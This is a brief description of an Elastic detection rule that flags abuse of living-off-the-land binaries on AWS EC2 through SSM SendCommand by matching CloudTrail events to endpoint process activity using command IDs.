This detection rule, created by Elastic, aims to identify potential malicious activity involving the execution of Living Off the Land Binaries (LOLBins) or GTFOBins on AWS EC2 instances through the AWS Systems Manager (SSM) using the `SendCommand` API. The rule correlates AWS CloudTrail `SendCommand` events with endpoint process execution by matching SSM command IDs, which allows the retrieval of executed commands even when AWS redacts command parameters in the logs. This method is critical since adversaries can exploit SSM to execute malicious commands without needing direct access methods like SSH or RDP, using legitimate administrative tools to accomplish actions such as data exfiltration, creating reverse shells, or lateral movements in the network.